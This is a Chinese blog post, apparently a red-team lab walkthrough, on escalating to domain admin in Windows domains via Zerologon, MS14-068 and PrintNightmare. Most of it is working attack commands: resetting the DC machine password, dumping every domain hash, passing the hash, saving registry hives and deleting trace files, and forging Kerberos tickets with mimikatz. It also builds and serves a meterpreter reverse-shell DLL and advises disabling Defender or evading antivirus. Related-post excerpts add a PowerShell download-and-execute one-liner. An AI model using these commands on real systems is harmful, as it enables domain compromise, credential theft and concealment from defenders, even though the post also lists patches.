域环境提权

已于 2022-01-21 17:08:28 修改
阅读量3.6k 收藏 6
点赞数
分类专栏: # 内网渗透 文章标签: 安全
于 2021-11-09 15:01:02 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/121222948
版权

文章目录

NetLogon特权域控提权漏洞(CVE-2020-1472)

简介
CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。

只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,

这个漏洞作用是将域控的机器账号密码置空,那么机器账号是啥呢?

MachineAccount 即机器账号、计算机账号,是每台计算机在安装系统后默认生成的帐户。所有加入域的也主机都会有一个机器用户,用户名为机器名加$,如:WIN7$WINXP$。我的理解是:机器账号对应计算机的system用户,属于服务账号的一种。

计算机帐户的密码存储在注册表中的位置为:

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\$machine.ACC
# 该注册表键路径只能在 SYSTEM 权限下访问

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core
installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

漏洞复现

mpacket网络协议工具包:https://github.com/SecureAuthCorp/impacket/

域控IP:10.10.10.10
域内跳板IP:10.10.10.12
域:redteam.com

查看域控的主机名:

net group "domain controllers" /domain

在这里插入图片描述
首先检测漏洞是否存在:

C:\Users\saulgoodman>python Desktop/CVE-2020-1472-master/cve-2020-1472-exploit.py -n DC-2016 -t 10.10.10.10

在这里插入图片描述
返回 Success,说明漏洞存在!输入y将域控机器账号重置:

使用impacket中的secretsdump.py导出域内所有用户的凭证:(-no-pass前有四个空格)

python Desktop/secretsdump.py redteam.com/DC-2016$@10.10.10.10    -no-pass

在这里插入图片描述
得到了域控的 Hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::

然后再通过 wmic hash 传递:

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 redteam.com/administrator@10.10.10.10

在这里插入图片描述
然后通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于
恢复,不然就脱域了:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save

在这里插入图片描述
记得下载完后删除痕迹文件:

del /f system.save
del /f sam.save
del /f security.save

之后通过 sam.save、security.save、system.save 这些文件获得原来域控机器上的 Ntlm
Hash 值,用于恢复密码:

python .\secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

通过拿到 $MACHINE.ACC: 的值,然后进行恢复: 注意只有后半部分:

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:c9420e14cc58d6cc4cc669d6b5fb4a33

python reinstall_original_pw.py DC-2016 10.10.10.10 c9420e14cc58d6cc4cc669d6b5fb4a33

在这里插入图片描述
此时使用空密码去获取域内的所有用户的凭证已经不行了:

python Desktop/secretsdump.py redteam.com/DC-2016$@10.10.10.10    -no-pass

在这里插入图片描述

MS14-068域提权漏洞(Pass the Ticket)票据传递攻击

域控:10.1.1.2
域名:hacke.testlab

首先查看是否打了补丁
在这里插入图片描述

systeminfo | findstr KB3011780

MS14-068 利⽤⼯具:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

# 查看⽤户 SID
whoami /user

#⽤法:
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

# 实例
MS14-068.exe -u testuser@hacke.testlab -p test -s S-1-5-21-335331429-2309386428-4146539646-1105 -d 10.1.1.2

在这里插入图片描述

如上图,成功⽣成名为 TGT_testuser@hacke.testlab.ccache的票据⽂件。

在没有注⼊票据之前 dir 域控是拒绝访问的:
在这里插入图片描述
接下来要做的就是将该票据⽂件注⼊到win7的内存中,利⽤ mimikatz 将票据注⼊到当前内存中,伪造凭证:

mimikatz.exe
kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
kerberos::list //查看当前机器凭证
kerberos::ptc TGT_testuser@hacke.testlab.ccache 票据⽂件 //将票据注⼊到内存中

在这里插入图片描述
虽然注入票据成功,但还是没能拿到域控shell,还是提示没权限
在这里插入图片描述
好像需要域控低于server2012才行,因为复现方法都一样,就不花时间再去搭建了,因为这个洞实战也没啥用。

Windows Print Spooler权限提升漏洞(CVE-2021-1675)

简介

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。

攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

这个洞和域没关系

漏洞复现

域控:10.10.10.10
kali:10.10.10.133
域:redteam.com

1.kali上安装impacket

git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install


2.配置smb服务

vim /etc/samba/smb.conf
:dG 删除所有内容

按照如下代码修改

idmap config * : backend = tdb行前的分号去掉
在这里插入图片描述
然后加入整个smb内容即可

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

3.重启smb服务

sudo service smbd start

4.生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.133 LPORT=4444 -f dll -o /tmp/rever.dll
msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
run

5.下载exp

cd ~/
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

6.利用漏洞

sudo python3 CVE-2021-1675.py 'redteam.com/herbert:saul!@#123@10.10.10.10' '\\10.10.10.133\smb\rever.dll'

虽然报错,但是成功获取了shell在这里插入图片描述

在这里插入图片描述7.迁移进程,漏洞利用成功后,该服务可能关闭

migrate -N explorer.exe

或者执行前先使用 set autorunscript -f 自动迁移到notepad

在这里插入图片描述
网上说只能利用一次,但是我这里测试好像没这限制

使用mimikatz攻击

mimikatz.exe
misc::printnightmare /server:10.10.10.10 /library:\\10.10.10.133\smb\rever.dll

漏洞修复
1、安装官方补丁

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675

2、临时防护措施:

1)在服务应用(services.msc)中找到Print Spooler服务。
2)停止运行服务,同时将“启动类型”修改为“禁用”。

PS:

1、关闭windows defender,或者做免杀
2、不要直接将配置文件替换为网站的,可能会导致kali无法启动

天问_Herbert555
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472 提权利用(提权
墨痕诉清风的博客
01-25 2283
控(Win2008):192.168.199.131 用户(Win7):192.168.199.128 用户(Win03):192.168.199.129 漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472 利用+重置工具:https://github.com/risksense/zerologon 重置hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472 工具运行环境:https://.
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local [email protected]用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc [email protected]" exit [email protected]指的是第一步所生成的ccache文件。 3. kerberos::ptc [email protected] 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
impacket安装
qq_44881113的博客
09-15 3169
下载地址:https://github.com/SecureAuthCorp/impacket.git Impacket 是一组用于处理网络协议的 Python 类。用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。 具体协议如下 Ethernet, Linux “Cooked” capture. IP, TCP, UDP, ICMP, IGMP, ARP.
内网渗透之环境探索和简单提权
最新发布
m0_70349048的博客
03-31 335
因为控可以登录内所有管辖的主机,因此登录过程中的密码会被记录下来,即winlog进程把密码拿到,发给后面的lasss,然后还会进行hash加密保存到SAM中。假如我么已经拿下了一个普通主机,想要登录权限更大的控,我们的目的就是获取控的密码,明文更好,hash后的也能用。内主机就作为普通的机器,只有普通的权限,一般我们拿下跳板机之后,就会拿下普通的主机,然后想办法提权或者进入控。控服务器是管理环境的,相当于“领导”,可以划分,提供服务,并且可以登录内的任何一台机器。
Impacket官方使用指南
weixin_30877755的博客
04-09 2784
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
40.网络安全渗透测试—[穷举篇3]—[KALI的Metasploit穷举模块的使用]
qwsn
08-06 2460
一、Metasploit的相关概念/下载地址/安装配置步骤 1、Metasploit相关概念: 2、Windows-Metasploit下载地址: 3、安装步骤: 4、配置步骤: 5、无需配置: 二、Kali Metasploit 穷举模块的使用 1、kali打开工具的方法:`msfconsole` 2、部分穷举模块:`auxiliary/scanner目录下` 3、用法示例:`以mysql为例` 三、Windows Metasploit 穷举模块的使用 四、`所有的穷举模块`
WINDOWS 环境下程序提权安装包制作程序工具及教程.7z
06-23
WINDOWS 环境下,普通用户提权运行应用程序,解决部分应用程序必须以计算机管理员才能运行,本质上提权也是计算机管理员运行,只是加密了管理员账号密码,普通用户无法直接看到。
kali下载impacket
李安北的博客
04-16 4051
需要python3的环境 git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python3 -m pip install . python3 setup.py install wmiexec.py:半交互式 shell,通过 Windows Management Instrumentation 使用。它不需要在目标服务器上安装任何服务/代理。以管理员身份运行。高度隐蔽。 wmiexec.py Administrato
渗透笔记-ADCS 提权-ESC1
NoooEmotion的博客
02-02 1330
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
MS14-068权限提升漏洞利用
cj_Hydra's Blog
02-15 1658
前言: 在写该篇文章之前,本人已经写过了关于渗透之黄金票据和白银票据的利用方式,今天的内容也是关于渗透提权的利用,并且MS14-068这个exp也是由kerberos协议而来。 在实际的渗透过程中,获得了一个成员(非管理员)的账号后,如果刚好控机器未打补丁(KB3011780)这是官方给出的修复补丁,那么就可以利用MS14-068该exp来快速获得控权限。 利用方式: 1:用户和密码 ...
环境提权姿势
懂进攻知防守
08-15 1126
Netlogon权限提升2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MSNRPC),建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。成功利用此漏洞的攻击者。可以在该网络中的设备上运行经特殊设计的应用程序。......
impacket-0.9.9.9
05-05
impacket-0.9.9.9,官方版本
CPAU提权管理软件
02-17
 -u 执行该命令的用户名,环境需要全称Domain\users  -p 该用户的密码  -ex 需要执行的程序路径,最好加上双引号“”  -enc 加密开关(必须用,否则在1.txt里面就能看到管理员密码了,用了之后看到的是加密...
javascript执行环境及作用详解
10-22
主要为大家详细介绍了javascript执行环境及作用,分别针对javascript执行环境及作用进行探讨,感兴趣的小伙伴们可以参考一下
环境添加网络共享登录凭证
03-10
环境添加网络共享登录凭证 登录需要输入用户名与密码的解决方法
windows认证&密码抓取
qq_44657899的博客
07-15 5821
文章目录基础知识windows版本历史一、工作组部分密码存放在哪里?NTML Hashwindows本地认证windows网络认证NTML v1与v2二、部分kerbero协议白银票据黄金票据windows密码导出lsass进程抓取mimikatz直接操作lsass进程procdump+mimikatzWindows Server 2016抓取明文密码sam文件(密文,需要破解,或者通过hash传递使用)用工具读取sam文件注册表导出sam文件使用mimipenguin获取linux明文登录密码windo
NTLM hash破解
qq_44657899的博客
10-15 5224
hash-identifier识别hash hashcat 指定字典破解 kali自带字典:/usr/share/wordlists/rockyou.txt hashcat -m 1000 -a 0 --force 1e14cbb32f5271876677e59d8ce3c060 pass.txt -m 指定模式 1000为ntlm v1 5600位ntlm v2 -a 指定破解模式 0位字典破解 然后后面为ntlm hash和字典 掩码破解 hashcat -m 1000 -a 3 --fo
windows提权总结
qq_44657899的博客
01-15 3968
文章目录0x01 使用ms16-032提权 0x01 使用ms16-032提权 exp地址: https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.12/Invoke-MS16-03
MSF使用总结
qq_44657899的博客
09-25 3826
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
winserver2019还原环境
07-13
要还原一个环境,您可以按照以下步骤进行操作: 1. 安装操作系统:首先,您需要安装 Windows Server 2019 操作系统。确保使用与之前环境相同的版本和版本号。 2. 安装控制器角色:打开“服务器管理器”,选择“添加角色和功能”向导。在向导中,选择“控制器”角色,并按照指示完成安装。 3. 配置控制器:在安装控制器角色后,您需要配置控制器。这包括指定的名称、设置管理员密码等。 4. 还原活动目录数据:如果您有先前备份的活动目录数据,您可以使用 Windows Server Backup 或其他备份软件还原这些数据。确保将备份数据还原到正确的位置,并按照还原软件的说明进行操作。 5. 连接到:完成还原后,您可以将计算机连接到。打开“控制面板”,选择“系统和安全”,然后选择“系统”。在系统窗口中,单击“更改设置”链接。在计算机名、和工作组设置中,选择“更改”按钮,并按照向导中的说明连接到。 这些步骤应该可以帮助您还原一个环境。请记住,在执行任何更改之前,务必备份您的数据以防止意外情况发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值